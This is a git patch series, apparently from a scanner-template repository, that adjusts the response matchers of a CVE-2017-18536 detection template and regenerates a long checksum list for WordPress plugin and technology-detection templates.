3 insertions(+), 6 deletions(-) diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index e39b79d433..8722a5afa4 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -39,12 +39,9 @@ http: - type: word part: body words: - - "forbidden - number in author name not allowed =" - - - type: word - part: body - words: + - "forbidden - number in author" - "" + condition: and - type: word part: header @@ -54,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095f1b8849e5c8ac04f646439eb2eb865483f6432fa2bb914e0942004393ffccc022100907a8ec81a4e92bfcf8c949f7d9e3853dc3033e1321a8ed4015f8aef930822e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210095f1b8849e5c8ac04f646439eb2eb865483f6432fa2bb914e0942004393ffccc022100907a8ec81a4e92bfcf8c949f7d9e3853dc3033e1321a8ed4015f8aef930822e4:922c64590222798bb761d5b6d8e72950 From 7dec09d1d4dc7af61cd8a935b453a3aced779102 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 20 Jun 2024 04:59:55 +0000 Subject: [PATCH 0437/1841] Auto Generated Templates Checksum [Thu Jun 20 04:59:55 UTC 2024] :robot: --- templates-checksum.txt | 416 +++++++++++++++++++++-------------------- 1 file changed, 211 insertions(+), 205 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e58b26fb0d..e15cbcc498 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -645,9 +645,9 @@ helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6 helpers/wordpress/plugins/astra-sites.txt:97d362c1e174c59583bc075f9c4f790b095f0935 helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:1889abba77b26fc1827431e5d46978a5e89769e6 -helpers/wordpress/plugins/backwpup.txt:66eed0a7a5e1364c307f42f580a7ff24e731f1a0 +helpers/wordpress/plugins/backwpup.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/better-wp-security.txt:f954f92b164d31ac62328698a1fa3f9b20d5ccc2 +helpers/wordpress/plugins/better-wp-security.txt:3fe0b3c91b9dd2a6f57c0d1e7ec7c05ac3858661 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/breadcrumb-navxt.txt:8470da5c818e6dc68d623fea21c1b507e075b906 helpers/wordpress/plugins/breeze.txt:12c708130d75c9e7150d0af82c0b82b66c6c85e0 @@ -667,13 +667,14 @@ helpers/wordpress/plugins/contact-form-7.txt:2cb2c87ac5ebde3b1ed1d5d55a5747b6f05 helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 helpers/wordpress/plugins/cookie-law-info.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 helpers/wordpress/plugins/cookie-notice.txt:5b3fa59c8d983303bb4380265de5153b897ee87d +helpers/wordpress/plugins/copy-delete-posts.txt:2c7ad9bdb0a7acde0d6d7e7f185bdbe164ef4ca9 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:8a49e162e780f4c3a1d7e6f60cbfde4d5158004e helpers/wordpress/plugins/custom-css-js.txt:4ef690b935393e44a136931421e45fe50451b469 helpers/wordpress/plugins/custom-fonts.txt:c7e3a41454e034e5ad994df8bf12b61e9fb1e1bc helpers/wordpress/plugins/custom-post-type-ui.txt:fcb074a94f4c6b8f87287f31608426312e7fb753 helpers/wordpress/plugins/disable-comments.txt:2ae3ad2f93cb6bc93d15eedb93cdf5051262687b -helpers/wordpress/plugins/disable-gutenberg.txt:8b06ddb10d32fd00c6f396f4696592af976b2118 +helpers/wordpress/plugins/disable-gutenberg.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 helpers/wordpress/plugins/duplicate-page.txt:eb8938636fe209df72afeee0da7ccac88ff1f5b9 helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/duplicator.txt:157d57f2e8bde3f7ab25703a4e4a74dc578bd412 @@ -695,14 +696,14 @@ helpers/wordpress/plugins/flamingo.txt:555a5c5c92b230dccab828d90e89ec66847ab9ce helpers/wordpress/plugins/fluentform.txt:62816587b37c8a986e8470456cb1ccaca418bd38 helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed137057665d helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 -helpers/wordpress/plugins/formidable.txt:885561af27d408d763c9217b9871abd3eea4f4a8 +helpers/wordpress/plugins/formidable.txt:309bd303ec4d8c564bacf4b39075aa7866dcdea4 helpers/wordpress/plugins/forminator.txt:4069b806e5d27e95685e8ab99e1322abd02eb9d4 helpers/wordpress/plugins/ga-google-analytics.txt:685772c638221af0e5cd971e0621df348dbadc35 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:bc9981e1c7ebf53d15d8cf9698c2bb6137881fc9 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:ba46cbfd15f3e265cd93b9b01e7e97a6fbfa3a14 helpers/wordpress/plugins/google-listings-and-ads.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 -helpers/wordpress/plugins/google-site-kit.txt:7697e2f00724b53c7cbc549f326edd9398a72802 +helpers/wordpress/plugins/google-site-kit.txt:b112d64c12ea14bbfa5671fe7ac7af8d575b1e0b helpers/wordpress/plugins/google-sitemap-generator.txt:5b10aa0446ed4db0d92e61d502b9ac9a6d6563e7 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/gutenberg.txt:d2fcc8823f1ab00267761e1899524f6acaf1c6ae @@ -715,6 +716,7 @@ helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf helpers/wordpress/plugins/hostinger.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 +helpers/wordpress/plugins/image-optimization.txt:2fdf7d04f0372055c9d77ca43d9a3c08798905f3 helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 helpers/wordpress/plugins/insert-headers-and-footers.txt:1467c965873cc632279bc3b451f12414b23902fc @@ -770,6 +772,7 @@ helpers/wordpress/plugins/really-simple-ssl.txt:d99db0a3dd6b78893c0a445c767ef7a5 helpers/wordpress/plugins/redirection.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/redux-framework.txt:0ad85a556e9d4c9fd4bb8da0f81f4d28b598587b helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 +helpers/wordpress/plugins/royal-elementor-addons.txt:e148fc472a5a0161cd1760ec8f7299c1026fc377 helpers/wordpress/plugins/safe-svg.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb helpers/wordpress/plugins/seo-by-rank-math.txt:c98fdfe8d33e88802886bd84d87d6117bcb8ad03 helpers/wordpress/plugins/sg-cachepress.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2 @@ -777,12 +780,14 @@ helpers/wordpress/plugins/sg-security.txt:3591720dc29efed55da59e353bbd1e1ad90ded helpers/wordpress/plugins/shortcodes-ultimate.txt:bd1b35ea2c8692269da8a819c39a7433032177ea helpers/wordpress/plugins/shortpixel-image-optimiser.txt:850cfb66b1912fccfdb12a41362d2393042887e5 helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b +helpers/wordpress/plugins/simple-history.txt:d29d2a3d67d2fb8572e4508f3748bc98f063f626 helpers/wordpress/plugins/simple-page-ordering.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/siteguard.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e helpers/wordpress/plugins/siteorigin-panels.txt:f522f67ac832d3968e5b0a47580f0ac715e89f4b helpers/wordpress/plugins/smart-slider-3.txt:ddd091c3f02b8a56a7a2d9a4a0f8387a12a347f9 helpers/wordpress/plugins/so-widgets-bundle.txt:222da8dca74c58580fd6817da4aef16582951efe helpers/wordpress/plugins/ssl-insecure-content-fixer.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 +helpers/wordpress/plugins/sticky-header-effects-for-elementor.txt:ff8246489d9fca30c2e6426aea442fe114e94244 helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt:3e2cb2d1f1740c5f32e24ad2ae43138ffd391c84 helpers/wordpress/plugins/sucuri-scanner.txt:418cebfead647b325cd7291fe371d7f92515a84f helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b172 @@ -801,7 +806,7 @@ helpers/wordpress/plugins/updraftplus.txt:e8615588a2454d2d3d48934cdf103f3177c30c helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb2bb helpers/wordpress/plugins/user-role-editor.txt:9404e7a541d10e6480bcec6f52d5fabcf1fd9c4b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 -helpers/wordpress/plugins/w3-total-cache.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 +helpers/wordpress/plugins/w3-total-cache.txt:c3c414dd549c09cb265d8cf95aef8445bf875384 helpers/wordpress/plugins/webp-converter-for-media.txt:5769e56370d18865a0fe37bcd84f60e61f7026d7 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c @@ -810,9 +815,10 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:d03f659256ae48f1c9a2 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:c8b9858b5f22b090d294062ac1a62f64a7de4d69 -helpers/wordpress/plugins/woocommerce-payments.txt:870e5d450f9b724470527fe121b78fd6bbf6d9aa +helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:a13d4e1d1641b231b44592642d25363ccc2cbb05 +helpers/wordpress/plugins/woocommerce-payments.txt:356ef5627363fd1b4d41745a26ed9916eeb9fe9b helpers/wordpress/plugins/woocommerce-paypal-payments.txt:0aaa3cea7451675ff270540e13308210d8fce9ab -helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:c7301e925a2837b1aba7035920723a45d112f866 +helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:a16cd18f1019f04b207109b189b504edbde41ab2 helpers/wordpress/plugins/woocommerce-services.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 helpers/wordpress/plugins/woocommerce.txt:d221ed6fdf5eb7524565cb7b691ea3effdcfb637 helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da @@ -1340,7 +1346,7 @@ http/cves/2017/CVE-2017-18528.yaml:1c2229d1bba8f9863847e11cd8d180c98ef90eaf http/cves/2017/CVE-2017-18529.yaml:89c767b8b124e36686e155009e365c6c3b0c6686 http/cves/2017/CVE-2017-18530.yaml:32dc03bb1f152ceae4c3716b380a274d3a0b7d00 http/cves/2017/CVE-2017-18532.yaml:c086ef546c86b9b1decf726d80792a0786cf2062 -http/cves/2017/CVE-2017-18536.yaml:41a5883c94c1941dbb3026c74c998dc04d1a601e +http/cves/2017/CVE-2017-18536.yaml:1d0aa6477c422562827bb3975b2309bc7151e582 http/cves/2017/CVE-2017-18537.yaml:1a8c7654a3767e77b04c5373847117343ef8b9e7 http/cves/2017/CVE-2017-18542.yaml:69e4b9bcde4a98cfa8e06c3dc033151d89beadde http/cves/2017/CVE-2017-18556.yaml:2561ca8692cf26d6cabf31c7d770b354ad73e863 @@ -3323,7 +3329,7 @@ http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-29824.yaml:536cf11756418d5648a093c543b58ed024e0d9fc -http/cves/2024/CVE-2024-29973.yaml:0a67d8067627c00bf65012d9dcdf9ac98eb46cc3 +http/cves/2024/CVE-2024-29973.yaml:e44f85b0fe7297f9b0ed996a2e9c7ca9e985fdb9 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae @@ -7105,227 +7111,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:dbfde9d91f781d959a21147d8b90cf27feb078d1 -http/technologies/wordpress/plugins/add-to-any.yaml:527342257321616af7f24a98e64e0737289431d9 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:385b7e18768e13eb02f30154d25589f9da5bf3c3 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:518e51ee781cdc6012be276e374da9595d407a3a -http/technologies/wordpress/plugins/akismet.yaml:1547bf6545b02ef629b9049df9c98a31431f3dea +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:37f3e7b2423a65ffe26fee852a39d8ad4553f8c7 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4323d8b96ffdb5a6e3ed7e9509d0bf330f663cd7 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:c76d27e825f6efa6e58082811032ac7b9bf6698c -http/technologies/wordpress/plugins/amp.yaml:811dae1c9ed6c9a09a9494e33e94977eac6aeb83 -http/technologies/wordpress/plugins/antispam-bee.yaml:c1b24f342dfd947720606c9fd6a87e613f09360d -http/technologies/wordpress/plugins/astra-sites.yaml:9fee9041cb567f98a0ec2fbe74e0388b10974ab3 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:4b8036d5d2e984e2b2a7248d30967fa066d5eb49 -http/technologies/wordpress/plugins/backwpup.yaml:c0e73b6a661f6b9afcef82b5bb3f907122c95603 -http/technologies/wordpress/plugins/better-search-replace.yaml:a1bf224126a58de84c95cfbd95c32155c87e1b85 -http/technologies/wordpress/plugins/better-wp-security.yaml:99f687eeb71440a35d0ebd132dbfc9f71e17c9a9 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:b6f93b17a8294a8c81f5419082fa81f97071ee65 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:e9c9b020a4a4628a509395ff59c5b6ecbae4ac5e -http/technologies/wordpress/plugins/breeze.yaml:e0fd122b2d34c8d6193ce62d238976d86565c7e0 -http/technologies/wordpress/plugins/broken-link-checker.yaml:6498974e2f525038b644befb8531a61352305daf -http/technologies/wordpress/plugins/child-theme-configurator.yaml:cfc0f7a38a32ed28445e2e85dfa3d574c5a378d4 -http/technologies/wordpress/plugins/classic-editor.yaml:acf8443e322f7e4b9610a2188cf63a158c6ff28a -http/technologies/wordpress/plugins/classic-widgets.yaml:2e2fb0e35a2a8ddad6b5a9aa99dd2760805a07b7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:a779b43a84c80e9a01fe81c654d9c4e9dc6e0c74 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:03a36d4b749ffe5c9b2a6782397b3363cf878304 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:9898ad29853a0621c7ec5c2f05b56416f119257f -http/technologies/wordpress/plugins/coblocks.yaml:6b82bfbd57d2430b21cb9829cc105df26ad9455d -http/technologies/wordpress/plugins/code-snippets.yaml:63d3cf65b1c8ca9db46ac3aa6ff69a31b82dfa39 -http/technologies/wordpress/plugins/coming-soon.yaml:6bfddff4b8b246f8dabb0d1f3924e010c7106e7d -http/technologies/wordpress/plugins/complianz-gdpr.yaml:86e211f50b91d96bbc6d501879077736ba2cdf96 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:3298ad224f9d81f4cd28abd0226fd4fc7771bc5c -http/technologies/wordpress/plugins/contact-form-7.yaml:34d246565c7759701d206f716c2a8540354dc0b9 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:1707e20b7caff80e933c13bbbeab28e21c3556a6 -http/technologies/wordpress/plugins/cookie-law-info.yaml:2975b37b1a306692fce049d8c50680d2db9366de -http/technologies/wordpress/plugins/cookie-notice.yaml:1206cb9ef094637b1d4d278ab08c052e472713f2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:dc2095558be073a2330fccfc86b78e385768ba6e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c http/technologies/wordpress/plugins/copy-delete-posts.yaml:1c9bb377abbf336c9ab111f368f48d8f8ec3927c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:a9e8c5e6a6aa2637394a3d0fa61822f97432fb78 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:3a617385a10102e4f735204337572d6fd09793ae -http/technologies/wordpress/plugins/custom-css-js.yaml:9cc5dca933f860d632658fd4016ede5b00f72a10 -http/technologies/wordpress/plugins/custom-fonts.yaml:7c5a87a2c10fe77bd5621b67b878ed27554c1f71 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:d4667323b592cd83f85fa89fd1ac5a7fec4ad70a -http/technologies/wordpress/plugins/disable-comments.yaml:ff3475bcdd7fccd8628ef45163410a5662b8d1e8 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:72555ec818ca31a76a7a0396d4b7e9198ae49c85 -http/technologies/wordpress/plugins/duplicate-page.yaml:f6ce3ca7c840bd585d9a8a40fba628a6570644db -http/technologies/wordpress/plugins/duplicate-post.yaml:fcc8937fbd5bfa09ae90f3ae2ce3362aaee50701 -http/technologies/wordpress/plugins/duplicator.yaml:db803a522ca486759a9ae6494c94af4b81dd27b1 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:e77279884ba7297fea1ea1229ccd23b213780dae +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:80ee9d72a05fa607b3bac8d43eaffdc294784889 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c5676cb3ffcf4cd88144a09e5d6acffcd2ce62f1 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:fdd2c32e4640843aacc4fce1d65a3175e32c988a +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13910c72122557903a40002d0f0dcd242980da26 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:f018281d35783c83a8813a321e511b7210b67d77 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:cb24e296621dfed77f291889b5094083275976a7 -http/technologies/wordpress/plugins/elementor.yaml:bee17dc0b93e4c2ca6bb99287e1540dbc4eaf37c -http/technologies/wordpress/plugins/elementskit-lite.yaml:7441fb07cde879aaa7188faf63e435c70814e8d5 -http/technologies/wordpress/plugins/enable-media-replace.yaml:20083e13c9f7c951cb9891bf4a1e51cd907be580 -http/technologies/wordpress/plugins/envato-elements.yaml:6aa3ca52dbe91fc2f41d81d2cf9cfcb5da611e73 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:23ac79f6481d37ef4237cfbcd133dabd5d72d486 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:6830cbd573ef2f9466cd915b57df5616fc669bfe -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:58de032246ee3406ad7751aa66e58ae7da93e056 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:28c617a6bf97df048ad47d76fa95befceb194b80 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:7224b2e0fe2938a513fc3817b4dfe11fe67f4271 -http/technologies/wordpress/plugins/flamingo.yaml:60a35df481b422f586387d0709d995437a1f1021 -http/technologies/wordpress/plugins/fluentform.yaml:0fd2d537bb944052c4fe072212325a3025c2fe5c -http/technologies/wordpress/plugins/font-awesome.yaml:dd914bff4b8d290a8c31b01aa7c49843bc1deb5f -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6ea5253db920851a80993a2d6b5a6662d8dc6cad -http/technologies/wordpress/plugins/formidable.yaml:20e8ac7904d4ca37f21f432c86c1d11c41d98a14 -http/technologies/wordpress/plugins/forminator.yaml:e1a28cbf60a139e74126564cbc17658f78f10ba4 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:87e37413b84309152315d8651664b29484b5644c -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:9eeaddccc2f81fa5afee374485eb3a6f3d839ce9 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:db90f24f596326229a78742fe1d062fc6c7aa9c6 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:00288b4d695fc67b6d86dbdea722d71bd5cd37ee -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:5695889bc92d33493cb469b8e2b4b56fcf8e35ce -http/technologies/wordpress/plugins/google-site-kit.yaml:bfe23618694960ad31d83be8d884c485c59e52fc -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:a04e5b47dfdafeabf274374bf01bcc7dfaab44d3 -http/technologies/wordpress/plugins/gtranslate.yaml:a6a2095cf8d26a0b72685e049de59b8ff1902e0a -http/technologies/wordpress/plugins/gutenberg.yaml:93a3cf9f85400691e66263bf193bb7d1ce76c2be -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:bf2f2dc00a56080346f1240648cf0a759aa042ca +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c64112a2a3423112f22659daf2845f7394e57725 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:fcb6316047b3cb92d6a79b6b3cd0bc5ec7410d8f +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:3a6a408c680afed419fd5cff87843d842fb53175 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:2f93216319633715b88eadfeb45c0e4f0fc1a9e7 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:db9313e5c1ba6ee717bdcaf28ca5bf4aef6282f4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e 